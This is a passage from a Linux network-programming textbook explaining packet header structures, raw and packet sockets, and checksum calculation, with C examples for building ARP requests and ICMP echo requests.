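 * the frame is not IPv4/TCP or is truncated. */
static long tcp_payload_offset(const unsigned char *frame, size_t len)
{
    const size_t ip_off = 14;                      /* Ethernet header length */
    size_t ihl, tcp_off, doff;

    if (len < ip_off + 20)
        return -1;
    if (frame[12] != 0x08 || frame[13] != 0x00)    /* packet type 0x0800 = IP */
        return -1;
    if ((frame[ip_off] >> 4) != 4)                 /* IP version 4 */
        return -1;
    ihl = (size_t)(frame[ip_off] & 0x0f) * 4;      /* IP header length, bytes */
    if (ihl < 20 || frame[ip_off + 9] != 6)        /* protocol 6 = TCP */
        return -1;
    tcp_off = ip_off + ihl;
    if (len < tcp_off + 20)
        return -1;
    doff = (size_t)(frame[tcp_off + 12] >> 4) * 4; /* TCP header length, bytes */
    if (doff < 20 || len < tcp_off + doff)
        return -1;
    return (long)(tcp_off + doff);
}
```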


3.4. Network Packet Header Structures 


To work with network packet header fields, a program must have the necessary structures defined. Linux stores the structure definitions for all main network packets in individual header files, which can be included in a program as necessary. Moreover, there are two separate sets of these header files, stored in two different directories. The first directory, /usr/include/linux, is used in Linux systems only. The other, /usr/include/netinet, is used in practically all UNIX varieties. Some header files for UNIX systems are also stored in the /usr/include/net directory.

The following are some examples of including header files from the /linux directory:

#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/udp.h>
#include <linux/icmp.h>
#include <linux/if_ether.h>

And these are some examples of including header files from the /netinet and /net directories:

#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/udp.h>
#include <netinet/ip_icmp.h>
#include <net/ethernet.h>

The names of the header files describe their contents. For example, the udp.h file contains the definition of the UDP header structure, the if_ether.h and ethernet.h files contain definitions of the Ethernet header structures, and the ip_icmp.h and icmp.h files contain definitions of the ICMP header structures.

The structures in the header files in these two directories are basically the same; the only difference is that field names sometimes differ. Also, in my experience the structures in the /usr/include/linux directory are more up-to-date and reflect the latest innovations in the network protocols. For example, the TCP header structure in the /linux/tcp.h header file has fields for the ECE and CWR flags (see RFC 3168), whereas these fields are missing from the analogous structure in the /netinet/tcp.h header file. Therefore, if your program must be compatible with various UNIX versions, you should use the header files from the /usr/include/netinet and /usr/include/net directories. If only Linux compatibility and modern structures are needed, use the header files from the /usr/include/linux directory. You can also mix header files from these directories, but take care that the structure definitions do not overlap.

There is an even better way than including the standard header files, and many programmers practice it: instead of including the structures from the standard header files, you define your own network packet structures in your program. You can do this by simply copying the necessary structures from the standard header files and, if desired, renaming their fields. Custom structures can also be stored in a custom header file, which is then included in your program. This method provides complete portability, because it eliminates the dependency on the system header files. It does have a small drawback: it is quite tedious, especially if you have to define many structures in a program.

For this book, I first wanted to use a unified approach, that is, to include structures from only one of the standard directories, namely /usr/include/netinet, in all programs that work with packet header fields. Having thought the matter over, however, I decided against this in favor of a mixed approach. So the source code in this book includes header files from both the /usr/include/linux and the /usr/include/netinet directories, as well as custom structure definitions.

The following subsections give short descriptions of the main network packet formats. 
Also, header structure definitions for network packets are given, which you can use in your 
programs as your own custom structures. No field descriptions are given; you can learn those 
in the corresponding RFCs. Only some specific information necessary for programming is 
provided. 

The header structures are based on the structures in the header files in the /usr/include/linux 
directory but are not their exact copies. 


3.4.1. Ethernet Header 


Figure 3.4 shows the format of the Ethernet packet, and Listing 3.1 shows the definition of the 
Ethernet header structure. 


Fig. 3.4. The Ethernet packet format








Listing 3.1. The Ethernet header structure definition 





struct ethhdr
{
    unsigned char  h_dest[ETH_ALEN];    /* Destination hardware address */
    unsigned char  h_source[ETH_ALEN];  /* Source hardware address */
    unsigned short h_proto;             /* Packet type */
};
The following are some constants and definitions taken from the /linux/if_ether.h header file, which you can use in your programs:

#define ETH_ALEN    6       /* Number of bytes in the hardware address */

/* Values for the "Packet Type" field */
#define ETH_P_IP    0x0800  /* IP packet */
#define ETH_P_X25   0x0805  /* X.25 packet */
#define ETH_P_ARP   0x0806  /* ARP packet */
#define ETH_P_RARP  0x8035  /* RARP packet */
#define ETH_P_ALL   0x0003  /* Any packet (Be careful with these) */
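The Packet Type field is stored in network byte order, so it must be converted with ntohs() before it is compared with the constants above. A minimal sketch, using the structure from Listing 3.1 and a hypothetical helper eth_type_name():

```c
#include <arpa/inet.h>   /* ntohs() */
#include <string.h>

#define ETH_ALEN   6
#define ETH_P_IP   0x0800
#define ETH_P_ARP  0x0806
#define ETH_P_RARP 0x8035

struct ethhdr {                        /* as in Listing 3.1 */
    unsigned char  h_dest[ETH_ALEN];
    unsigned char  h_source[ETH_ALEN];
    unsigned short h_proto;            /* network byte order on the wire */
};

/* Hypothetical helper: name the packet type of a frame (at least 14 bytes). */
static const char *eth_type_name(const unsigned char *frame)
{
    struct ethhdr eh;

    memcpy(&eh, frame, sizeof eh);     /* copying avoids misaligned access */
    switch (ntohs(eh.h_proto)) {       /* convert before comparing */
    case ETH_P_IP:   return "IP";
    case ETH_P_ARP:  return "ARP";
    case ETH_P_RARP: return "RARP";
    default:         return "other";
    }
}
```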


3.4.2. IP Header 


Figure 3.5 shows the format of the IP packet, and Listing 3.2 shows the definition of the IP 
header structure. 


Fig. 3.5. The IP packet format. Fields: Version (4 bits), Header length (4 bits), Type of service (8 bits), Total length (16 bits); Packet identifier (16 bits), Flags (3 bits), Fragment offset (13 bits); Time to live (8 bits), Protocol (8 bits), Header checksum (16 bits); Source IP address (32 bits); Destination IP address (32 bits); Options and padding (up to 40 bytes).





Listing 3.2. The IP header structure definition 





typedef unsigned char  __u8;
typedef unsigned short __u16;
typedef unsigned int   __u32;

struct iphdr {
    __u8  ihl:4,       /* Header's length in 4-byte words */
          version:4;   /* Version (this bit order is for little-endian machines) */
    __u8  tos;         /* Service type */
    __u16 tot_len;     /* Total packet length in bytes */
    __u16 id;          /* Packet identifier */
    __u16 frag_off;    /* Flags and the fragment offset */
    __u8  ttl;         /* Time to live */
    __u8  protocol;    /* Protocol */
    __u16 check;       /* Checksum */
    __u32 saddr;       /* Source IP address */
    __u32 daddr;       /* Destination IP address */
};





Individual flags in the IP header, located in the frag_off field of the structure, can be accessed with the help of a bit operation on this field and the following macro definitions:

#define IP_RF      0x8000  /* Reserved (set to 0) */
#define IP_DF      0x4000  /* Fragmentation prohibited */
#define IP_MF      0x2000  /* More fragments following */
#define IP_OFFMASK 0x1fff  /* Mask for the "Fragment Offset" field */
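Because frag_off is stored in network byte order, it should be converted with ntohs() before the masks are applied. The sketch below assumes the macro values above; the helper names are hypothetical. The Fragment Offset field counts 8-byte units, so it is multiplied by 8 to obtain a byte offset.

```c
#include <arpa/inet.h>   /* ntohs(), htons() */
#include <stdint.h>

#define IP_RF      0x8000
#define IP_DF      0x4000
#define IP_MF      0x2000
#define IP_OFFMASK 0x1fff

/* frag_off_net is the frag_off field exactly as it appears in the header. */
static int ip_dont_fragment(uint16_t frag_off_net)
{
    return (ntohs(frag_off_net) & IP_DF) != 0;
}

static int ip_more_fragments(uint16_t frag_off_net)
{
    return (ntohs(frag_off_net) & IP_MF) != 0;
}

/* Fragment offset converted from 8-byte units to bytes. */
static unsigned ip_fragment_offset_bytes(uint16_t frag_off_net)
{
    return (ntohs(frag_off_net) & IP_OFFMASK) * 8u;
}
```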


The following are some constants and definitions taken from the /netinet/in.h header file, 
which you can use in your programs: 


/* Values for the "Protocol" field */
enum {
    IPPROTO_IP   = 0,    /* Dummy protocol for TCP */
#define IPPROTO_IP   IPPROTO_IP
    IPPROTO_ICMP = 1,    /* ICMP */
#define IPPROTO_ICMP IPPROTO_ICMP
    IPPROTO_IGMP = 2,    /* IGMP */
#define IPPROTO_IGMP IPPROTO_IGMP
    IPPROTO_TCP  = 6,    /* TCP */
#define IPPROTO_TCP  IPPROTO_TCP
    IPPROTO_EGP  = 8,    /* Exterior gateway protocol */
#define IPPROTO_EGP  IPPROTO_EGP
    IPPROTO_UDP  = 17,   /* UDP */
#define IPPROTO_UDP  IPPROTO_UDP
    IPPROTO_RAW  = 255,  /* Raw IP packets */
#define IPPROTO_RAW  IPPROTO_RAW
};


3.4.3. ARP Header


Figure 3.6 shows the format of the ARP packet, and Listing 3.3 shows the definition of the ARP header structure.





Listing 3.3. The ARP header structure definition 





struct arphdr
{
    unsigned short ar_hrd;             /* Equipment type */
    unsigned short ar_pro;             /* Protocol type */
    unsigned char  ar_hln;             /* Hardware address length */
    unsigned char  ar_pln;             /* Protocol address length */
    unsigned short ar_op;              /* Operation code */
    unsigned char  ar_sha[ETH_ALEN];   /* Source hardware address */
    unsigned char  ar_sip[4];          /* Source IP address */
    unsigned char  ar_tha[ETH_ALEN];   /* Destination hardware address */
    unsigned char  ar_tip[4];          /* Destination IP address */
};





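Fig. 3.6. The format of the ARP packet. Fields: Equipment type (16 bits), Protocol type (16 bits); Hardware address length (8 bits), Protocol address length (8 bits), Operation code (16 bits); Source hardware address (48 bits for Ethernet); Source protocol address (32 bits for IPv4); Destination hardware address (48 bits for Ethernet); Destination protocol address (32 bits for IPv4).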


The following are some constants and definitions taken from the /linux/if_arp.h header file, which you can use in your programs:

/* Values for the "Equipment Type" field */
#define ARPHRD_ETHER    1     /* Ethernet 10 Mbps */
#define ARPHRD_ARCNET   7     /* ARCnet */
#define ARPHRD_ATM      19    /* ATM */
#define ARPHRD_X25      271   /* CCITT X.25 */
#define ARPHRD_PPP      512   /* PPP */

/* Values for the "Operation Code" field */
#define ARPOP_REQUEST   1     /* ARP request */
#define ARPOP_REPLY     2     /* ARP reply */
#define ARPOP_RREQUEST  3     /* RARP request */
#define ARPOP_RREPLY    4     /* RARP reply */

The format of the RARP packet and the structure of the RARP header are virtually identical to those of the ARP packet, the only difference being the value of the Operation Code field.
Note the following important point. In the ARP header structure definitions in the system header files, the last four fields are enclosed between the #if 0 and #endif preprocessor directives; that is, they are excluded from compilation. This is the case for both /linux/if_arp.h and /net/if_arp.h. Therefore, referring to these fields in a program produces a compiler error. The only way to use them is to define your own ARP header structure; the easiest way to do this is simply to copy the source code from Listing 3.3.
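As an illustration of why the full structure is useful, here is a minimal sketch that fills in an ARP request ("who has target_ip?") for Ethernet and IPv4. It copies Listing 3.3 under the hypothetical name arphdr_full to avoid clashing with a system definition and defines the constants it needs locally; multibyte fields are stored in network byte order. In an actual request, this structure follows an Ethernet header addressed to the broadcast address ff:ff:ff:ff:ff:ff with the packet type ETH_P_ARP.

```c
#include <arpa/inet.h>   /* htons(), ntohs() */
#include <string.h>

#define ETH_ALEN      6
#define ETH_P_IP      0x0800
#define ARPHRD_ETHER  1
#define ARPOP_REQUEST 1

struct arphdr_full {                   /* Listing 3.3, renamed */
    unsigned short ar_hrd;
    unsigned short ar_pro;
    unsigned char  ar_hln;
    unsigned char  ar_pln;
    unsigned short ar_op;
    unsigned char  ar_sha[ETH_ALEN];
    unsigned char  ar_sip[4];
    unsigned char  ar_tha[ETH_ALEN];
    unsigned char  ar_tip[4];
};

/* Fill an ARP request asking for the MAC address of target_ip.
 * The target hardware address is unknown and stays all zeros. */
static void build_arp_request(struct arphdr_full *arp,
                              const unsigned char sender_mac[ETH_ALEN],
                              const unsigned char sender_ip[4],
                              const unsigned char target_ip[4])
{
    memset(arp, 0, sizeof *arp);
    arp->ar_hrd = htons(ARPHRD_ETHER);
    arp->ar_pro = htons(ETH_P_IP);
    arp->ar_hln = ETH_ALEN;
    arp->ar_pln = 4;
    arp->ar_op  = htons(ARPOP_REQUEST);
    memcpy(arp->ar_sha, sender_mac, ETH_ALEN);
    memcpy(arp->ar_sip, sender_ip, 4);
    memcpy(arp->ar_tip, target_ip, 4);
}
```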


3.4.4. TCP Header 


Figure 3.7 shows the format of the TCP packet, and Listing 3.4 shows the definition of the TCP header structure.


Fig. 3.7. The format of the TCP packet. Fields: Source port (16 bits), Destination port (16 bits); Sequence number (32 bits); Acknowledgment number (32 bits); Data offset (4 bits), Reserved (4 bits), flags (8 bits), Window size (16 bits); Checksum (16 bits), Urgent data indicator (16 bits); Parameters and alignment.





Listing 3.4. The TCP header structure definition 


typedef unsigned short __u16;
typedef unsigned int   __u32;

struct tcphdr {
    __u16 source;     /* Source port number */
    __u16 dest;       /* Destination port number */
    __u32 seq;        /* Sequence number */
    __u32 ack_seq;    /* Acknowledgment number */
    __u16 res1:4,     /* Reserved (this bit order is for little-endian machines) */
          doff:4,     /* Data offset */
          fin:1,      /* Close the connection */
          syn:1,      /* Request to establish a connection */
          rst:1,      /* Break the connection */
          psh:1,      /* Immediately send a message to the process */
          ack:1,      /* Enabling the acknowledgment number field */
          urg:1,      /* Enabling the urgency pointer field */
          ece:1,      /* ECN-Echo flag (RFC 3168) */
          cwr:1;      /* Congestion Window Reduced flag (RFC 3168) */
    __u16 window;     /* Window size */
    __u16 check;      /* Checksum */
    __u16 urg_ptr;    /* Last byte of an urgent message */
};
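The order of bit fields within a byte depends on the compiler and the byte order (the Linux headers choose the layout with __LITTLE_ENDIAN_BITFIELD or __BIG_ENDIAN_BITFIELD), so the layout above matches little-endian machines. A portable alternative, sketched below, reads the flags directly from byte 13 of the TCP header and the data offset from the high 4 bits of byte 12. The macro and function names are hypothetical.

```c
/* Bit masks for the flags byte (byte 13 of the TCP header). */
#define TCPFLAG_FIN 0x01
#define TCPFLAG_SYN 0x02
#define TCPFLAG_RST 0x04
#define TCPFLAG_PSH 0x08
#define TCPFLAG_ACK 0x10
#define TCPFLAG_URG 0x20
#define TCPFLAG_ECE 0x40
#define TCPFLAG_CWR 0x80

/* TCP header length in bytes (data offset counts 4-byte words). */
static unsigned tcp_header_len(const unsigned char *tcp)
{
    return (unsigned)(tcp[12] >> 4) * 4u;
}

/* Nonzero for a SYN+ACK segment (the reply to a connection request). */
static int tcp_is_syn_ack(const unsigned char *tcp)
{
    unsigned char f = tcp[13];
    return (f & (TCPFLAG_SYN | TCPFLAG_ACK | TCPFLAG_RST)) ==
           (TCPFLAG_SYN | TCPFLAG_ACK);
}
```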





3.4.5. UDP Header 


Figure 3.8 shows the format of the UDP packet, and Listing 3.5 shows the definition of the UDP header structure.


Fig. 3.8. The format of the UDP packet. Fields: Source port (16 bits), Destination port (16 bits); Length (16 bits), Checksum (16 bits).





Listing 3.5. The UDP header structure definition 





typedef unsigned short __u16;

struct udphdr {
    __u16 source;   /* Source port number */
    __u16 dest;     /* Destination port number */
    __u16 len;      /* Message length */
    __u16 check;    /* Checksum */
};





3.4.6. ICMP Header 


Figure 3.9 shows the format of the ICMP packet, and Listing 3.6 shows the definition of the 
ICMP header structure. 
Fig. 3.9. The format of the ICMP packet. Fields: Type (8 bits), Code (8 bits), Checksum (16 bits); Identifier (16 bits), Sequence number (16 bits).





Listing 3.6. The ICMP header structure definition 





typedef unsigned char  __u8;
typedef unsigned short __u16;
typedef unsigned int   __u32;

struct icmphdr {
    __u8  type;               /* Message type */
    __u8  code;               /* Message code */
    __u16 checksum;           /* Checksum */
    union {
        struct {
            __u16 id;         /* Identifier */
            __u16 sequence;   /* Sequence number */
        } echo;
        __u32 gateway;        /* Gateway address (redirect messages) */
        struct {
            __u16 __unused;
            __u16 mtu;        /* Next-hop MTU (fragmentation needed) */
        } frag;
    } un;
};





The following are some constants and definitions taken from the /linux/icmp.h header file, which you can use in your programs:

/* Values for the "Message Type" field */
#define ICMP_ECHOREPLY      0    /* Echo reply */
#define ICMP_DEST_UNREACH   3    /* Destination unreachable */
#define ICMP_SOURCE_QUENCH  4    /* Source quench */
#define ICMP_REDIRECT       5    /* Redirect (change route) */
#define ICMP_ECHO           8    /* Echo request */
#define ICMP_TIME_EXCEEDED  11   /* Time exceeded */
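Putting the ICMP header fields together, the following sketch builds an echo request of the kind ping sends. It works on a byte buffer rather than on struct icmphdr, zeroes the checksum field before computing the checksum over the header and data, and carries its own copy of the one's complement checksum (the algorithm described in Section 3.6) so that the example is self-contained. The function names csum() and build_echo_request() are hypothetical.

```c
#include <arpa/inet.h>   /* htons() */
#include <stddef.h>
#include <string.h>

#define ICMP_ECHO 8

/* One's complement checksum over a byte buffer. */
static unsigned short csum(const void *data, size_t len)
{
    const unsigned char *p = data;
    unsigned long sum = 0;
    unsigned short word;

    while (len > 1) {
        memcpy(&word, p, 2);       /* native-order 16-bit word */
        sum += word;
        p += 2;
        len -= 2;
    }
    if (len == 1) {                /* pad the last byte with a zero byte */
        word = 0;
        memcpy(&word, p, 1);
        sum += word;
    }
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);
    return (unsigned short)~sum;
}

/* Build an ICMP echo request (8-byte header + dlen data bytes) in pkt;
 * returns the total length. */
static size_t build_echo_request(unsigned char *pkt, unsigned short id,
                                 unsigned short seq,
                                 const void *data, size_t dlen)
{
    unsigned short n, ck;

    pkt[0] = ICMP_ECHO;                 /* type */
    pkt[1] = 0;                         /* code */
    pkt[2] = pkt[3] = 0;                /* checksum zeroed first */
    n = htons(id);  memcpy(pkt + 4, &n, 2);
    n = htons(seq); memcpy(pkt + 6, &n, 2);
    memcpy(pkt + 8, data, dlen);
    ck = csum(pkt, 8 + dlen);           /* header and data */
    memcpy(pkt + 2, &ck, 2);            /* stored as computed, no swap */
    return 8 + dlen;
}
```

Recomputing csum() over the finished packet returns 0, which is a convenient self-check.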


Table 3.1 lists the main types of ICMP messages. 
Table 3.1. ICMP messages

Type | Code | Description
3    |      | Destination unreachable, because:
     | 0    | Net is unreachable.
     | 1    | Host is unreachable.
     | 2    | Protocol is unreachable.
     | 3    | Port is unreachable.
     | 4    | Fragmentation is needed and DF = 1. Sent by an IP router when a packet must be fragmented but fragmentation is not allowed.
     | 5    | Source route failed.
4    | 0    | Source quench. Informs a sending host that its IP datagrams are being dropped because of congestion at the router, so that the host lowers its transmission rate.
5    |      | Redirect. Informs a sending host of a better route to a destination IP address for:
     | 0    | The given network
     | 1    | The given host
     | 2    | The given network with the given Type of Service (TOS)
     | 3    | The given host with the given TOS
8    | 0    | Echo request
9    | 0    | Router advertisement
10   | 0    | Router solicitation
11   |      | Time exceeded during the following:
     | 0    | Transmission
     | 1    | Assembly
12   |      | Parameter problem:
     | 0    | IP header error
     | 1    | A necessary option is missing
17   | 0    | Address mask request
18   | 0    | Address mask reply
3.5. Sockets


Sockets are created in a program using the socket() function, which has the following prototype:

int socket(int domain, int type, int protocol);


This function does not simply create a socket but also enables access to the protocols of 
a certain TCP/IP stack layer. Depending on the specific layer, sockets are given different names. 


3.5.1. Transport Layer: Stream and Datagram Sockets 


To obtain access to the transport layer, the SOCK_STREAM constant (for TCP) or the SOCK_DGRAM constant (for UDP) must be specified as the type argument of the socket() function. Accordingly, the created sockets are called stream and datagram sockets. Values such as PF_UNIX or PF_LOCAL for local connections, PF_INET for IPv4 family protocols, PF_INET6 for IPv6 family protocols, and PF_IPX for Novell protocols can be specified as the domain argument of the socket() function.

I only consider operations in the PF_INET domain. For stream and datagram sockets, the protocol argument is normally 0, which selects the default protocol for the socket type (TCP for stream sockets, UDP for datagram sockets). The following are examples of creating a stream and a datagram socket:

sd = socket(PF_INET, SOCK_STREAM, 0);  /* Stream socket */
sd = socket(PF_INET, SOCK_DGRAM, 0);   /* Datagram socket */

Datagram and stream sockets are suitable for programming most regular applications, but they are too limited for programming hacker utilities. For example, they provide no access to packet headers below the transport layer, no way to exchange ICMP messages, and no way to construct and send custom packets.

You can consult man 2 socket for more detailed information on stream and datagram 
sockets. 


3.5.2. Network Layer: Raw Sockets 


To obtain access to the network layer, the SOCK_RAW constant must be used as the type argument of the socket() function. This type of socket is called a raw socket. The same values are used for the domain argument as for datagram and stream sockets. The protocol argument specifies the protocol whose packets will be exchanged. The /netinet/in.h file contains all possible constants for the protocol argument, some of which were mentioned in Section 3.4.2.

The following are some examples of creating raw sockets:

/* To receive or send TCP packets */
sd = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);

/* To receive or send UDP packets */
sd = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);

/* To receive or send ICMP packets */
sd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP);

/* To send any type of packet */
sd = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);

You should be aware of an important particularity concerning the protocol argument. A socket created with any of these protocol constants can both send and receive packets of that protocol, but packets of arbitrary type can be sent only through a socket created with IPPROTO_RAW. Such a socket, however, cannot receive packets: although neither the compiler nor socket() reports an error, attempts to receive packets on a socket created with the IPPROTO_RAW protocol argument will not succeed.

You can create and send custom packets with raw sockets. However, when a packet is sent, its IP header is normally generated by the TCP/IP stack. Therefore, if you need a custom IP header, you have to set the IP_HDRINCL option on the raw socket using the setsockopt() function as follows (on Linux, a socket created with IPPROTO_RAW has this option enabled automatically):

const int on = 1;

if (setsockopt(sd, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) {
    perror("setsockopt() failed");
    exit(EXIT_FAILURE);
}

Only privileged users can create raw sockets (on Linux, processes running as root or having the CAP_NET_RAW capability).

Raw sockets do not provide access to header fields of the data link layer; therefore, to ob- 
tain this access, you must use packet sockets. 

For details on raw sockets, consult man 7 raw. 


3.5.3. Data Link Layer: Packet Sockets


To obtain access to the data link layer, the PF_PACKET constant must be used as the domain argument of the socket() function. Sockets of this type are called packet sockets. Note that this is the only type of socket for which PF_PACKET rather than PF_INET is specified as the domain argument. Packet sockets make it possible to send and receive packets at the device driver level (the OSI data link layer).

Only SOCK_RAW or SOCK_DGRAM can be specified as the type argument. You should remember the difference between these two types.

With SOCK_RAW, packets are passed to and received from the device driver unmodified. If a program must process fields in the received packets, it must prepare a buffer large enough for all packet headers, including the data link layer header.

The SOCK_DGRAM type operates at a higher level. The data link layer header is stripped from a received packet before the packet is passed to the program, and packets sent through a SOCK_DGRAM packet socket automatically have a suitable data link layer header prepended before being sent. In other words, a SOCK_DGRAM socket does not allow access to the data link layer header.

The protocol argument specifies the number of the protocol to be used, in network byte order. The /linux/if_ether.h file contains a list of protocols that can be used, some of which were mentioned in Section 3.4.1. If protocol is htons(ETH_P_ALL), the socket handles packets of all protocols.
The following are some examples of creating packet sockets:

/* For receiving or sending ARP packets */
sd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ARP));

/* For receiving or sending IP packets without access to the data link layer header */
sd = socket(PF_PACKET, SOCK_DGRAM, htons(ETH_P_IP));

/* For receiving or sending any type of packet */
sd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));

There is another, obsolete, way of creating a packet socket. In Linux 2.0, the only way to obtain a packet socket was the following call:

socket(PF_INET, SOCK_PACKET, protocol);

This method is still supported, but I strongly recommend against using it. The main difference between the two methods is that SOCK_PACKET uses the old struct sockaddr_pkt structure to specify the interface, which does not provide physical layer independence. I describe this method only because it is used in numerous old programs, whose source code you should be able to read. The same method is also used by Richard Stevens in his books.

A program that uses packet sockets must include the following header files:

#include <sys/socket.h>
#include <features.h>          /* For the glibc version number */
#if __GLIBC__ >= 2 && __GLIBC_MINOR__ >= 1
#include <netpacket/packet.h>
#include <net/ethernet.h>      /* L2 protocols */
#else
#include <asm/types.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>    /* L2 protocols */
#endif

Packet sockets have a special socket address structure:

struct sockaddr_ll {
    unsigned short sll_family;    /* Always AF_PACKET */
    unsigned short sll_protocol;  /* Physical layer protocol */
    int            sll_ifindex;   /* Interface index */
    unsigned short sll_hatype;    /* Header type */
    unsigned char  sll_pkttype;   /* Packet type */
    unsigned char  sll_halen;     /* Address length */
    unsigned char  sll_addr[8];   /* Physical layer address */
};

For details on packet sockets, consult man 7 packet.
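The sockaddr_ll structure is what binds a packet socket to a single interface. A sketch, assuming a Linux system with glibc: the interface index is obtained with if_nametoindex(), and only sll_family, sll_protocol, and sll_ifindex need to be set for bind(). The helper names are hypothetical, and opening the socket requires root privileges (or CAP_NET_RAW).

```c
#include <arpa/inet.h>          /* htons() */
#include <linux/if_ether.h>     /* ETH_P_ALL */
#include <net/if.h>             /* if_nametoindex() */
#include <netpacket/packet.h>   /* struct sockaddr_ll */
#include <string.h>
#include <sys/socket.h>         /* socket(), bind(), AF_PACKET */
#include <unistd.h>             /* close() */

/* Fill a sockaddr_ll naming interface ifname. Returns -1 if unknown. */
static int fill_sockaddr_ll(struct sockaddr_ll *sll, const char *ifname,
                            unsigned short proto)
{
    unsigned int idx = if_nametoindex(ifname);
    if (idx == 0)
        return -1;
    memset(sll, 0, sizeof *sll);
    sll->sll_family   = AF_PACKET;
    sll->sll_protocol = htons(proto);   /* network byte order */
    sll->sll_ifindex  = (int)idx;
    return 0;
}

/* Open a SOCK_RAW packet socket that sees only traffic on ifname.
 * Returns the descriptor, or -1 on failure (errno is set). */
static int open_bound_packet_socket(const char *ifname)
{
    struct sockaddr_ll sll;
    int sd;

    if (fill_sockaddr_ll(&sll, ifname, ETH_P_ALL) < 0)
        return -1;
    sd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (sd < 0)
        return -1;
    if (bind(sd, (struct sockaddr *)&sll, sizeof sll) < 0) {
        close(sd);
        return -1;
    }
    return sd;
}
```

A call such as open_bound_packet_socket("eth0") would then receive frames from that interface only; the interface name is just an example.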


3.6. Checksum in Packet Headers 


Most packet headers have a checksum field. The algorithm for calculating the checksum is 
described in the RFC for each protocol. By default, the TCP/IP stack fills the checksum field of 
all headers when sending packets and verifies the checksum when receiving packets. 
But if packet header fields of raw sockets or packet sockets have to be filled manually, the checksum values also have to be calculated and placed into the checksum fields manually. The TCP/IP stack on the receiving side treats a packet whose checksum field is not filled in correctly as erroneous and simply drops it. (On Linux, the kernel still fills in the IP header checksum for raw sockets with IP_HDRINCL, but not the checksums of the TCP, UDP, or ICMP headers.)

According to the protocol RFCs, the same algorithm is used for calculating the checksum in the IP, UDP, TCP, ICMP, and IGMP headers. It is described as follows (this wording is from RFC 793, the TCP specification):

The checksum field is the 16-bit one's complement of the one's complement sum of all 16-bit words in the header and text. If a segment contains an odd number of header and text octets to be checksummed, the last octet is padded on the right with zeros to form a 16-bit word for checksum purposes. The pad is not transmitted as part of the segment.

Unfortunately, there is no standard function for calculating the checksum. The examples in this book use a well-known C implementation of such a function; its source code is shown in Listing 3.7. Nothing stops you from writing your own, more efficient version.





Listing 3.7. Checksum calculation function 





unsigned short in_cksum(unsigned short *addr, int len)
{
    unsigned short result;
    unsigned int sum = 0;

    /* Adding all 2-byte words */
    while (len > 1) {
        sum += *addr++;
        len -= 2;
    }

    /* Adding the leftover byte, if any, as the first byte of a
       zero-padded word (correct on both little- and big-endian machines) */
    if (len == 1) {
        unsigned short last = 0;
        *(unsigned char *)&last = *(unsigned char *)addr;
        sum += last;
    }

    sum = (sum >> 16) + (sum & 0xFFFF);  /* Adding the carry */
    sum += (sum >> 16);                  /* Adding the carry again */
    result = ~sum;                       /* Inverting the result */
    return result;
}
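To check an implementation against a known value, the sketch below applies a copy of in_cksum() from Listing 3.7 (with the leftover byte placed in the first byte of a zero-padded word) to a sample 20-byte IP header, 45 00 00 73 00 00 40 00 40 11 00 00 c0 a8 00 01 c0 a8 00 c7, whose checksum is b8 61. The helper ip_set_checksum() is hypothetical. The result is stored exactly as returned, without htons(), because the one's complement sum yields correctly ordered bytes on both little- and big-endian machines.

```c
#include <string.h>

static unsigned short in_cksum(unsigned short *addr, int len)
{
    unsigned int sum = 0;

    while (len > 1) {
        sum += *addr++;
        len -= 2;
    }
    if (len == 1) {
        unsigned short last = 0;
        *(unsigned char *)&last = *(unsigned char *)addr;
        sum += last;
    }
    sum = (sum >> 16) + (sum & 0xFFFF);
    sum += (sum >> 16);
    return (unsigned short)~sum;
}

/* Recompute the checksum of the IP header at iph in place. */
static void ip_set_checksum(unsigned char *iph)
{
    unsigned short hdr[30];               /* maximum IP header is 60 bytes */
    int hlen = (iph[0] & 0x0f) * 4;       /* header length in bytes */
    unsigned short ck;

    iph[10] = iph[11] = 0;                /* zero the checksum field first */
    memcpy(hdr, iph, (size_t)hlen);       /* aligned copy for 16-bit reads */
    ck = in_cksum(hdr, hlen);
    memcpy(iph + 10, &ck, 2);             /* no byte swap needed */
}
```

The same routine is what must be rerun whenever any header byte changes, for example after the TTL is decremented.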





As you can see, the in_cksum() function is passed the starting address and the length of the data for which the checksum is to be calculated. These values differ for the IP, UDP, TCP, ICMP, and IGMP headers and are determined for each type of header as follows:


• ICMP Header Checksum. The checksum is calculated on all bytes of the ICMP header and the data field. Consequently, the starting address of the ICMP header and the total length of the ICMP header and the data field must be passed to the in_cksum() function.

• IP Header Checksum. The checksum is calculated on the IP header only; the data field is not used in the calculation. Accordingly, the starting address and the length of the IP header must be passed to the in_cksum() function.
• TCP Header Checksum. In addition to the TCP header and the data field, the checksum is calculated on the 96 bits (12 bytes) of the so-called pseudo header, placed before the TCP header. This pseudo header is not sent to the network and is only used for local calculation. The pseudo header contains the source and destination IP addresses, a zero byte, a Protocol field analogous to the same field in the IP header, and the length of the TCP packet (see Fig. 3.10). The length of the TCP packet is the overall length of the TCP header and the data field in bytes. In this way, TCP protects against misrouted segments.


Fig. 3.10. The pseudo header for calculating the TCP header checksum (Source address, Destination address, zero byte, Protocol, TCP length)


The source code for the pseudo header structure used in the programs in this book is shown in Listing 3.8.





Listing 3.8. The TCP pseudo header structure 





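struct pseudohdr
{
    unsigned int   source_address;  /* Source IP address */
    unsigned int   dest_address;    /* Destination IP address */
    unsigned char  place_holder;    /* Zero byte */
    unsigned char  protocol;        /* Protocol (6 for TCP) */
    unsigned short length;          /* Length of TCP header + data */
} pseudo_hdr;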





Thus, when calculating the checksum for the TCP header, the in_cksum() function must be passed the starting address of the pseudo header and the total length of the pseudo header, TCP header, and data field; the three must therefore lie contiguously in one buffer.


